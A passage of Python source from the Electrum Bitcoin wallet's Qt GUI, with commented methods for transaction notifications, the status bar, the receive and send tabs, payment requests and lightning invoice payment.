                           _("Uses icons from the Icons8 icon pack (icons8.com).")))
    def show_update_check(self, version=None):
        # Stored on gui_object so the dialog object is not garbage-collected
        # (same GC concern noted for the update-check thread in __init__).
        self.gui_object._update_check = UpdateCheck(latest_version=version)
    def show_report_bug(self):
        """Show the bug-reporting instructions dialog."""
        msg = ' '.join([
            _("Please report any bugs as issues on github:<br/>"),
            f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
            _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
            _("Try to explain not only what the bug is, but how it occurs.")
        ])
        self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
    def notify_transactions(self):
        """Drain the queued incoming transactions and surface them as tray
        notifications, rate-limited to one batch per 20 seconds and combined
        into a single message when there are at least three."""
        if self.tx_notification_queue.qsize() == 0:
            return
        if not self.wallet.up_to_date:
            return  # no notifications while syncing
        now = time.time()
        rate_limit = 20  # seconds
        if self.tx_notification_last_time + rate_limit > now:
            return
        self.tx_notification_last_time = now
        self.logger.info("Notifying GUI about new transactions")
        txns = []
        while True:
            try:
                txns.append(self.tx_notification_queue.get_nowait())
            except queue.Empty:
                break
        # Combine the transactions if there are at least three
        if len(txns) >= 3:
            total_amount = 0
            for tx in txns:
                tx_wallet_delta = self.wallet.get_wallet_delta(tx)
                if not tx_wallet_delta.is_relevant:
                    # tx does not affect this wallet; skip
                    continue
                total_amount += tx_wallet_delta.delta
            self.notify(_("{} new transactions: Total amount received in the new transactions {}")
                        .format(len(txns), self.format_amount_and_units(total_amount)))
        else:
            for tx in txns:
                tx_wallet_delta = self.wallet.get_wallet_delta(tx)
                if not tx_wallet_delta.is_relevant:
                    continue
                self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
    """Show *message* as a system-tray balloon notification, if a tray exists."""
    if self.tray:
        try:
            # this requires Qt 5.9
            self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
        except TypeError:
            # older Qt: fall back to the overload taking a standard icon enum
            self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
    """Periodic refresh driven by a Qt timer; must run in the GUI thread."""
    self.request_list.refresh_status()
    # Note this runs in the GUI thread
    if self.need_update.is_set():
        self.need_update.clear()
        self.update_wallet()
    elif not self.wallet.up_to_date:
        # this updates "synchronizing" progress
        self.update_status()
    # resolve aliases
    # FIXME this is a blocking network call that has a timeout of 5 sec
    self.payto_e.resolve()
    self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
    """Format a satoshi amount *x* according to the user's unit settings."""
    # formatting is fully delegated to the config object
    return self.config.format_amount(
        x,
        is_diff=is_diff,
        whitespaces=whitespaces,
    )
def format_amount_and_units(self, amount):
    """Return *amount* (in sats) with its unit, appending fiat when available."""
    text = self.config.format_amount_and_units(amount)
    fiat = self.fx.format_amount_and_units(amount) if self.fx else None
    if text and fiat:
        text = '%s (%s)' % (text, fiat)
    return text
def format_fee_rate(self, fee_rate):
    """Delegate fee-rate formatting to the config object."""
    cfg = self.config
    return cfg.format_fee_rate(fee_rate)
def get_decimal_point(self):
    """Number of decimal places of the configured base unit."""
    cfg = self.config
    return cfg.get_decimal_point()
def base_unit(self):
    """Name of the configured base unit, as reported by the config."""
    cfg = self.config
    return cfg.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
    """Keep a BTC amount edit and its fiat twin synchronized.

    When the user edits one field, the other is recomputed from the
    current exchange rate and highlighted blue. The `follows` flag
    suppresses the symmetric update that the programmatic
    setText/setAmount would otherwise trigger (avoiding recursion).
    """
    def edit_changed(edit):
        if edit.follows:
            # change was made programmatically by the twin edit; ignore
            return
        edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
        fiat_e.is_last_edited = (edit == fiat_e)
        amount = edit.get_amount()
        rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
        if rate.is_nan() or amount is None:
            # no exchange rate (or cleared field): blank out the other side
            if edit is fiat_e:
                btc_e.setText("")
                if fee_e:
                    fee_e.setText("")
            else:
                fiat_e.setText("")
        else:
            if edit is fiat_e:
                btc_e.follows = True
                btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                btc_e.follows = False
                if fee_e:
                    window.update_fee()
            else:
                fiat_e.follows = True
                fiat_e.setText(self.fx.ccy_amount_str(
                    amount * Decimal(rate) / COIN, False))
                fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                fiat_e.follows = False
    btc_e.follows = False
    fiat_e.follows = False
    fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
    btc_e.textChanged.connect(partial(edit_changed, btc_e))
    fiat_e.is_last_edited = False
def update_status(self):
    """Refresh the status-bar text/icon and the tray tooltip.

    Reflects connectivity, sync progress, server lag, and the balances
    (confirmed/unconfirmed/unmatured, plus lightning and fiat when enabled).
    """
    if not self.wallet:
        return
    if self.network is None:
        text = _("Offline")
        icon = read_QIcon("status_disconnected.png")
    elif self.network.is_connected():
        server_height = self.network.get_server_height()
        server_lag = self.network.get_local_height() - server_height
        fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
        # Server height can be 0 after switching to a new server
        # until we get a headers subscription request response.
        # Display the synchronizing message in that case.
        if not self.wallet.up_to_date or server_height == 0:
            num_sent, num_answered = self.wallet.get_history_sync_state_details()
            text = ("{} ({}/{})"
                    .format(_("Synchronizing..."), num_answered, num_sent))
            icon = read_QIcon("status_waiting.png")
        elif server_lag > 1:
            text = _("Server is lagging ({} blocks)").format(server_lag)
            icon = read_QIcon("status_lagging%s.png"%fork_str)
        else:
            # c/u/x: confirmed, unconfirmed, unmatured balances
            c, u, x = self.wallet.get_balance()
            text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
            if u:
                text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
            if x:
                text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
            if self.wallet.has_lightning():
                l = self.wallet.lnworker.get_balance()
                # U+26A1 is the lightning-bolt glyph
                text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
            # append fiat balance and price
            if self.fx.is_enabled():
                text += self.fx.get_fiat_status_text(c + u + x,
                    self.base_unit(), self.get_decimal_point()) or ''
            if not self.network.proxy:
                icon = read_QIcon("status_connected%s.png"%fork_str)
            else:
                icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
    else:
        if self.network.proxy:
            text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
        else:
            text = _("Not connected")
        icon = read_QIcon("status_disconnected.png")
    self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
    self.balance_label.setText(text)
    if self.status_button:
        self.status_button.setIcon( icon )
def update_wallet(self):
    """Refresh the status bar, and the tabs once the wallet is caught up."""
    self.update_status()
    synced = self.wallet.up_to_date
    disconnected = not self.network or not self.network.is_connected()
    if synced or disconnected:
        self.update_tabs()
def update_tabs(self, wallet=None):
    """Refresh every list/tab view; ignores events for other wallets."""
    wallet = self.wallet if wallet is None else wallet
    if wallet != self.wallet:
        return
    self.history_model.refresh('update_tabs')
    for view in (self.request_list, self.address_list, self.utxo_list,
                 self.contact_list, self.invoice_list):
        view.update()
    self.channels_list.update_rows.emit(wallet)
    self.update_completions()
def create_channels_tab(self):
    """Build and return the Channels tab widget."""
    self.channels_list = ChannelsList(self)
    toolbar = self.channels_list.get_toolbar()
    return self.create_list_tab(self.channels_list, toolbar)
def create_history_tab(self):
    """Build the History tab: its model, list view and toolbar."""
    self.history_model = HistoryModel(self)
    self.history_list = HistoryList(self, self.history_model)
    self.history_model.set_view(self.history_list)
    self.history_list.searchable_list = self.history_list
    toolbar = self.history_list.create_toolbar(self.config)
    show_it = bool(self.config.get('show_toolbar_history', False))
    self.history_list.show_toolbar(show_it)
    return self.create_list_tab(self.history_list, toolbar)
def show_address(self, addr):
    """Open a modal dialog with details for *addr*."""
    from . import address_dialog
    dialog = address_dialog.AddressDialog(self, addr)
    dialog.exec_()
def show_channel(self, channel_id):
    """Open a (non-modal) details window for the given channel."""
    from . import channel_details
    dialog = channel_details.ChannelDetailsDialog(self, channel_id)
    dialog.show()
def show_transaction(self, tx, *, tx_desc=None):
    """Open the transaction dialog for *tx*.

    tx_desc is set only for txs created in the Send tab.
    """
    # delegates to the module-level show_transaction helper
    show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
    """Open the lightning transaction dialog for *tx_item*."""
    from .lightning_tx_dialog import LightningTxDialog
    LightningTxDialog(self, tx_item).show()
def create_receive_tab(self):
    """Build the Receive tab: request form, action buttons, the
    address/request/QR views, and the list of past requests."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.receive_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    self.receive_message_e = QLineEdit()
    grid.addWidget(QLabel(_('Description')), 0, 0)
    grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
    self.receive_message_e.textChanged.connect(self.update_receive_qr)
    self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
    grid.addWidget(QLabel(_('Requested amount')), 1, 0)
    grid.addWidget(self.receive_amount_e, 1, 1)
    self.receive_amount_e.textChanged.connect(self.update_receive_qr)
    self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_receive_e.setVisible(False)
    grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
    self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
    # NOTE(review): this wires the *send*-tab amount widgets from within the
    # receive tab, so it requires create_send_tab() to have run first --
    # confirm the tab creation order guarantees that.
    self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
    self.expires_combo = QComboBox()
    evl = sorted(pr_expiration_values.items())
    evl_keys = [i[0] for i in evl]
    evl_values = [i[1] for i in evl]
    default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
    try:
        i = evl_keys.index(default_expiry)
    except ValueError:
        # configured expiry is not one of the known choices; use the first
        i = 0
    self.expires_combo.addItems(evl_values)
    self.expires_combo.setCurrentIndex(i)
    self.expires_combo.setFixedWidth(self.receive_amount_e.width())
    def on_expiry(i):
        # persist the chosen expiry for future requests
        self.config.set_key('request_expiry', evl_keys[i])
    self.expires_combo.currentIndexChanged.connect(on_expiry)
    msg = ' '.join([
        _('Expiration date of your request.'),
        _('This information is seen by the recipient if you send them a signed payment request.'),
        _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
        _('The bitcoin address never expires and will always be part of this electrum wallet.'),
    ])
    grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
    grid.addWidget(self.expires_combo, 2, 1)
    self.expires_label = QLineEdit('')
    self.expires_label.setReadOnly(True)  # fixed: pass a bool, not the int 1
    self.expires_label.setFocusPolicy(Qt.NoFocus)
    self.expires_label.hide()
    grid.addWidget(self.expires_label, 2, 1)
    self.clear_invoice_button = QPushButton(_('Clear'))
    self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
    self.create_invoice_button = QPushButton(_('New Address'))
    self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
    self.create_invoice_button.setToolTip('Create on-chain request')
    self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
    self.receive_buttons = buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_invoice_button)
    buttons.addWidget(self.create_invoice_button)
    if self.wallet.has_lightning():
        # NOTE(review): the button text is already 'New Address'; this re-set
        # is a no-op -- confirm whether a different label was intended here.
        self.create_invoice_button.setText(_('New Address'))
        self.create_lightning_invoice_button = QPushButton(_('Lightning'))
        self.create_lightning_invoice_button.setToolTip('Create lightning request')
        self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
        self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
        buttons.addWidget(self.create_lightning_invoice_button)
    grid.addLayout(buttons, 4, 3, 1, 2)
    self.receive_payreq_e = ButtonsTextEdit()
    self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
    self.receive_payreq_e.addCopyButton(self.app)
    self.receive_payreq_e.setReadOnly(True)
    self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
    self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
    self.receive_qr = QRCodeWidget(fixedSize=220)
    self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
    self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
    self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
    self.receive_address_e = ButtonsTextEdit()
    self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
    self.receive_address_e.addCopyButton(self.app)
    self.receive_address_e.setReadOnly(True)
    self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
    qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
    qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
    self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
    self.receive_requests_label = QLabel(_('Receive queue'))
    from .request_list import RequestList
    self.request_list = RequestList(self)
    receive_tabs = QTabWidget()
    receive_tabs.addTab(self.receive_address_e, _('Address'))
    receive_tabs.addTab(self.receive_payreq_e, _('Request'))
    receive_tabs.addTab(self.receive_qr, _('QR Code'))
    receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
    receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
    # retain size when hidden so the layout does not jump
    receive_tabs_sp = receive_tabs.sizePolicy()
    receive_tabs_sp.setRetainSizeWhenHidden(True)
    receive_tabs.setSizePolicy(receive_tabs_sp)
    def maybe_hide_receive_tabs():
        # only show the tabs when there is a request to display
        receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
    self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
    maybe_hide_receive_tabs()
    # layout
    vbox_g = QVBoxLayout()
    vbox_g.addLayout(grid)
    vbox_g.addStretch()
    hbox = QHBoxLayout()
    hbox.addLayout(vbox_g)
    hbox.addStretch()
    hbox.addWidget(receive_tabs)
    w = QWidget()
    w.searchable_list = self.request_list
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.receive_requests_label)
    vbox.addWidget(self.request_list)
    vbox.setStretchFactor(self.request_list, 1000)
    return w
def delete_requests(self, keys):
    """Delete the given receive requests from the wallet and refresh the UI."""
    for request_key in keys:
        self.wallet.delete_request(request_key)
    self.request_list.update()
    self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
    """Delete a lightning invoice and refresh both request and invoice lists."""
    self.wallet.lnworker.delete_invoice(payreq_key)
    for view in (self.request_list, self.invoice_list):
        view.update()
    self.clear_receive_tab()
def sign_payment_request(self, addr):
    """Sign the payment request for *addr* with the user's alias key.

    Does nothing unless an alias is configured and resolved, and its
    address belongs to this wallet. Prompts for the wallet password
    when the keystore is encrypted; aborts silently if the user cancels.
    """
    alias = self.config.get('alias')
    if alias and self.alias_info:
        alias_addr, alias_name, validated = self.alias_info
        if alias_addr:
            if self.wallet.is_mine(alias_addr):
                msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                password = None
                if self.wallet.has_keystore_encryption():
                    password = self.password_dialog(msg)
                    if not password:
                        # user cancelled the password prompt
                        return
                try:
                    self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                except Exception as e:
                    self.show_error(repr(e))
                    return
            else:
                # alias address is not ours: cannot sign
                return
def create_invoice(self, is_lightning):
    """Create a new receive request (lightning or on-chain) from the form.

    On success, selects the new request in the list, clears the form
    fields, and copies the invoice/address to the clipboard.
    """
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
    if is_lightning:
        if not self.wallet.lnworker.channels:
            self.show_error(_("You need to open a Lightning channel first."))
            return
        # TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
        key = self.wallet.lnworker.add_request(amount, message, expiry)
    else:
        key = self.create_bitcoin_request(amount, message, expiry)
        if not key:
            # user aborted (e.g. declined address reuse)
            return
        self.address_list.update()
    assert key is not None
    self.request_list.update()
    self.request_list.select_key(key)
    # clear request fields
    self.receive_amount_e.setText('')
    self.receive_message_e.setText('')
    # copy to clipboard
    r = self.wallet.get_request(key)
    content = r.invoice if r.is_lightning() else r.get_address()
    title = _('Invoice') if is_lightning else _('Address')
    self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
    """Create and store an on-chain payment request.

    Returns the receiving address used, or None if the user aborted.
    When no unused address is available, either reuses one (imported
    wallets, after confirmation) or derives a fresh one (deterministic
    wallets, after a gap-limit warning).
    """
    addr = self.wallet.get_unused_address()
    if addr is None:
        if not self.wallet.is_deterministic():  # imported wallet
            msg = [
                _('No more addresses in your wallet.'), ' ',
                _('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
                _('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
                _('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
            ]
            if not self.question(''.join(msg)):
                return
            addr = self.wallet.get_receiving_address()
        else:  # deterministic wallet
            if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
                return
            addr = self.wallet.create_new_address(False)
    req = self.wallet.make_payment_request(addr, amount, message, expiration)
    try:
        self.wallet.add_payment_request(req)
    except Exception as e:
        self.logger.exception('Error adding payment request')
        self.show_error(_('Error adding payment request') + ':\n' + repr(e))
    else:
        # only sign when the request was successfully stored
        self.sign_payment_request(addr)
    return addr
def do_copy(self, content: str, *, title: str = None) -> None:
    """Copy *content* to the clipboard and show a confirmation tooltip.

    *title* (e.g. 'Invoice', 'Address') is interpolated into the tooltip;
    when omitted a generic message is shown.
    """
    self.app.clipboard().setText(content)
    if title is None:
        # fixed: the generic template has no placeholder, so the previous
        # `.format(title)` call was a misleading no-op
        tooltip_text = _("Text copied to clipboard")
    else:
        tooltip_text = _("{} copied to clipboard").format(title)
    QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
    """Reset every widget on the receive tab to its empty state."""
    for edit in (self.receive_payreq_e, self.receive_address_e, self.receive_message_e):
        edit.setText('')
    self.receive_amount_e.setAmount(None)
    self.expires_label.hide()
    self.expires_combo.show()
    self.request_list.clearSelection()
def toggle_qr_window(self):
    """Show/hide the detached QR window, preserving its geometry across toggles."""
    from . import qrwindow
    if not self.qr_window:
        # first use: create the window and remember its initial geometry
        self.qr_window = qrwindow.QR_Window(self)
        self.qr_window.setVisible(True)
        self.qr_window_geometry = self.qr_window.geometry()
    else:
        if not self.qr_window.isVisible():
            # restore at the last saved position/size
            self.qr_window.setVisible(True)
            self.qr_window.setGeometry(self.qr_window_geometry)
        else:
            # save geometry before hiding so the next show restores it
            self.qr_window_geometry = self.qr_window.geometry()
            self.qr_window.setVisible(False)
    self.update_receive_qr()
def show_send_tab(self):
    """Switch the main tab widget to the Send tab."""
    idx = self.tabs.indexOf(self.send_tab)
    self.tabs.setCurrentIndex(idx)
def show_receive_tab(self):
    """Switch the main tab widget to the Receive tab."""
    idx = self.tabs.indexOf(self.receive_tab)
    self.tabs.setCurrentIndex(idx)
def update_receive_qr(self):
    """Refresh the QR widget (and detached QR window) from the request text."""
    uri = str(self.receive_payreq_e.text())
    if maybe_extract_bolt11_invoice(uri):
        # encode lightning invoices as uppercase so QR encoding can use
        # alphanumeric mode; resulting in smaller QR codes
        uri = uri.upper()
    self.receive_qr.setData(uri)
    qr_win = self.qr_window
    if qr_win and qr_win.isVisible():
        qr_win.qrw.setData(uri)
def update_receive_address_styling(self):
    """Color the receiving address red when it has been used before."""
    addr = str(self.receive_address_e.text())
    reused = is_address(addr) and self.wallet.is_used(addr)
    if reused:
        self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
        self.receive_address_e.setToolTip(_("This address has already been used. "
                                            "For better privacy, do not reuse it for new payments."))
    else:
        self.receive_address_e.setStyleSheet("")
        self.receive_address_e.setToolTip("")
def create_send_tab(self):
    """Build the Send tab: payto/description/amount form, action buttons,
    and the list of queued invoices."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.send_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    from .paytoedit import PayToEdit
    self.amount_e = BTCAmountEdit(self.get_decimal_point)
    self.payto_e = PayToEdit(self)
    self.payto_e.addPasteButton(self.app)
    msg = _('Recipient of the funds.') + '\n\n'\
        + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
    payto_label = HelpLabel(_('Pay to'), msg)
    grid.addWidget(payto_label, 1, 0)
    grid.addWidget(self.payto_e, 1, 1, 1, -1)
    completer = QCompleter()
    completer.setCaseSensitivity(False)
    self.payto_e.set_completer(completer)
    completer.setModel(self.completions)
    msg = _('Description of the transaction (not mandatory).') + '\n\n'\
        + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
    description_label = HelpLabel(_('Description'), msg)
    grid.addWidget(description_label, 2, 0)
    self.message_e = FreezableLineEdit()
    self.message_e.setMinimumWidth(700)
    grid.addWidget(self.message_e, 2, 1, 1, -1)
    msg = _('Amount to be sent.') + '\n\n' \
        + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
        + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
        + _('Keyboard shortcut: type "!" to send all your coins.')
    amount_label = HelpLabel(_('Amount'), msg)
    grid.addWidget(amount_label, 3, 0)
    grid.addWidget(self.amount_e, 3, 1)
    self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_send_e.setVisible(False)
    grid.addWidget(self.fiat_send_e, 3, 2)
    # fiat field mirrors the frozen state of the BTC amount field
    self.amount_e.frozen.connect(
        lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
    self.max_button = EnterButton(_("Max"), self.spend_max)
    self.max_button.setFixedWidth(100)
    self.max_button.setCheckable(True)
    grid.addWidget(self.max_button, 3, 3)
    self.save_button = EnterButton(_("Save"), self.do_save_invoice)
    self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
    self.clear_button = EnterButton(_("Clear"), self.do_clear)
    buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_button)
    buttons.addWidget(self.save_button)
    buttons.addWidget(self.send_button)
    grid.addLayout(buttons, 6, 1, 1, 4)
    # "!" shortcut in the amount field triggers spend-max
    self.amount_e.shortcut.connect(self.spend_max)
    def reset_max(text):
        # manual edits of either amount field cancel "Max" mode
        self.max_button.setChecked(False)
        enable = not bool(text) and not self.amount_e.isReadOnly()
        #self.max_button.setEnabled(enable)
    self.amount_e.textEdited.connect(reset_max)
    self.fiat_send_e.textEdited.connect(reset_max)
    self.set_onchain(False)
    self.invoices_label = QLabel(_('Send queue'))
    from .invoice_list import InvoiceList
    self.invoice_list = InvoiceList(self)
    # layout
    vbox0 = QVBoxLayout()
    vbox0.addLayout(grid)
    hbox = QHBoxLayout()
    hbox.addLayout(vbox0)
    hbox.addStretch(1)
    w = QWidget()
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.invoices_label)
    vbox.addWidget(self.invoice_list)
    vbox.setStretchFactor(self.invoice_list, 1000)
    w.searchable_list = self.invoice_list
    run_hook('create_send_tab', grid)
    return w
def spend_max(self):
    """Fill the amount field with the maximum spendable amount ("Max")."""
    if run_hook('abort_send', self):
        return
    outputs = self.payto_e.get_outputs(True)
    if not outputs:
        return
    make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
        coins=self.get_coins(),
        outputs=outputs,
        fee=fee_est,
        is_sweep=False)
    try:
        try:
            tx = make_tx(None)
        except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
            # Check if we had enough funds excluding fees,
            # if so, still provide opportunity to set lower fees.
            tx = make_tx(0)
    except MultipleSpendMaxTxOutputs as e:
        self.max_button.setChecked(False)
        self.show_error(str(e))
        return
    except NotEnoughFunds as e:
        # not enough funds even at zero fee
        self.max_button.setChecked(False)
        text = self.get_text_not_enough_funds_mentioning_frozen()
        self.show_error(text)
        return
    self.max_button.setChecked(True)
    amount = tx.output_value()
    # plugins may add an extra fee that must be subtracted from the shown amount
    __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
    amount_after_all_fees = amount - x_fee_amount
    self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
    """String to put in the payto field for contact *key*."""
    contact_type, label = self.contacts.get(key)
    if contact_type == 'address':
        return label + ' <' + key + '>'
    return key
def update_completions(self):
    """Rebuild the payto completer entries from the contact list."""
    entries = [self.get_contact_payto(key) for key in self.contacts.keys()]
    self.completions.setStringList(entries)
@protected
def protect(self, func, args, password):
    """Run *func* under the @protected password prompt.

    The decorator supplies *password* after asking the user; it is
    appended as the last positional argument to *func*.
    """
    return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
    """Outputs for the tx being built: taken from the payment request when
    one is active, otherwise parsed from the payto field."""
    if self.payment_request:
        return self.payment_request.get_outputs()
    return self.payto_e.get_outputs(self.max_button.isChecked())
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
    """Returns whether there are errors with outputs.
    Also shows error dialog to user if so.
    """
    if not outputs:
        self.show_error(_('No outputs'))
        return True
    for output in outputs:
        if output.scriptpubkey is None:
            self.show_error(_('Bitcoin Address is None'))
            return True
        if output.value is None:
            self.show_error(_('Invalid Amount'))
            return True
    # all outputs have a script and an amount
    return False
def check_send_tab_payto_line_and_show_errors(self) -> bool:
    """Returns whether there are errors.
    Also shows error dialog to user if so.
    """
    pr = self.payment_request
    if pr:
        if pr.has_expired():
            self.show_error(_('Payment request has expired'))
            return True
    if not pr:
        errors = self.payto_e.get_errors()
        if errors:
            if len(errors) == 1 and not errors[0].is_multiline:
                # single-line failure: show the offending line and exception
                err = errors[0]
                self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
                                  f"{err.line_content[:40]}...\n\n"
                                  f"{err.exc!r}")
            else:
                # several bad lines: list each with its 1-based line number
                self.show_warning(_("Invalid Lines found:") + "\n\n" +
                                  '\n'.join([_("Line #") +
                                             f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
                                             for err in errors]))
            return True
        if self.payto_e.is_alias and self.payto_e.validated is False:
            # alias resolved but failed DNSSEC validation; let the user decide
            alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "{}" could not be validated via an additional '
                    'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
            msg += _('Do you wish to continue?')
            if not self.question(msg):
                return True
    return False  # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
    """Confirm with the user, then pay a BOLT11 invoice on the wallet thread.

    Raises when *amount_msat* is None: amountless invoices must be given
    an amount by the caller before reaching this point.
    """
    if amount_msat is None:
        raise Exception("missing amount for LN invoice")
    amount_sat = Decimal(amount_msat) / 1000
    # FIXME this is currently lying to user as we truncate to satoshis
    msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
    if not self.question(msg):
        return
    self.save_pending_invoice()
    attempts = LN_NUM_PAYMENT_ATTEMPTS
    def task():
        # runs on the wallet's worker thread, not the GUI thread
        self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
    self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
    """Handle a request-status event; refresh the list and notify on payment."""
    if wallet != self.wallet:
        # event belongs to a different open wallet
        return
    req = self.wallet.receive_requests.get(key)
    if req is None:
        return
    self.request_list.update_item(key, req)
    self.request_list.update()
    if status == PR_PAID:
        self.notify(_('Payment received') + '\n' + key)
        self.need_update.set()
def on_invoice_status(self, wallet, key):
    """Refresh the invoice-list entry for *key* on a status-change event."""
    if wallet != self.wallet:
        return
    invoice = self.wallet.get_invoice(key)
    if invoice is None:
        return
    self.invoice_list.update_item(key, invoice)
    self.invoice_list.update()
def on_payment_succeeded(self, wallet, key):
    """Notify the user that an outgoing payment completed."""
    # NOTE(review): unlike on_request_status/on_invoice_status, there is no
    # wallet identity check here -- confirm this is intended.
    description = self.wallet.get_label(key)
    self.notify(_('Payment succeeded') + '\n\n' + description)
    self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
    """Show the failure *reason* for an outgoing payment."""
    # NOTE(review): no wallet identity check here, unlike on_invoice_status
    self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
    """Build an invoice object from the current send-tab contents.

    Returns an LNInvoice (lightning mode) or a wallet-created on-chain
    invoice, or None after showing an error when the form is invalid.
    """
    if self.check_send_tab_payto_line_and_show_errors():
        return
    if not self._is_onchain:
        invoice_str = self.payto_e.lightning_invoice
        if not invoice_str:
            return
        if not self.wallet.has_lightning():
            self.show_error(_('Lightning is disabled'))
            return
